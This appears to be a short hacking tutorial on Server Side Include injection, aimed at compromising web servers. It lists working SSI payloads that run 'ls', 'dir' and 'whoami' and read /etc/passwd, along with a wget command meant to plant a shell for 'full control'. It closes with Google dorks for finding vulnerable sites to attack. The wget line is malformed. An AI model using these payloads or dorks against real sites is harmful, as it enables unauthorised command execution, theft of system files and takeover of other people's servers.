SSI Tutorial.

1. Server Side Includes
2.  
3. What is It?
4.  
5. A Server Side Include Attack is an Extremely Useful attack for executing commands on the server. You need basic knowledge of Bash or Batch to know what commands could help compromise the server to do this.
6.  
7. What Sites are Vulnerable?
8.  
9. For a site to be vulnerable to SSI Injection, Apache needs Server Side Includes aloud in the config file or the file extention must end in ‘.shtml’ ‘.shtm’ or ‘.stm’ both Apache, lighthttpd and IIS support SSI.
10.  
11. Testing for SSI Injection
12.  
13. To audit a site to check if it is vulnerable to SSI Injection you search all the directories for ‘.shtml’ ‘.shtm’ or ‘.stm’ extentions, if you find any then its probably enabled, if you dont find any it still may be enabled. It effects pages with unsanitized requests, (eg no filters, filtering < !–#exec …–>) To test you enter the following command into the request
14.  
15. < !–#exec cmd=”ls” –>
16.  
17. If you get a filesystem output appear then it is vulnerable, if the server is Windows replace the ‘ls’ for ‘dir’
18. You test for SSI the same way as XSS, you can post the command into
19.  
20. - Textboxes/search boxes
21. - Headers
22. - Cookies
23. - Address Bar
24.  
25. Useful Commands
26.  
27. Show Files Linux
28.  
29. < !–#exec cmd=”ls” –>
30.  
31. Show Files Windows
32.  
33. < !–#exec cmd=”dir” –>
34.  
35. Read /etc/passwd
36.  
37. <!–#include virtual=”/etc/passwd” –>
38.  
39. What User Is the webserver running on
40.  
41. < !–#exec cmd=”whoami” –>
42.  
43. Download a shell to the server to get full control
44.  
45. < !–#exec cmd=”wget “shell.php”" –>
46.  
47. Dorks
48.  
49. Simillar to SQLi dorks, they get a list of sites that may or may not be vulnerable to SSI Injection
50.  
51. inurl:index.shtml
52. inurl:index.shtm
53. inurl:index.stm
54.  
55. There's many others but you can just use your imagination.
56.  
57. Hope you liked this tutorial.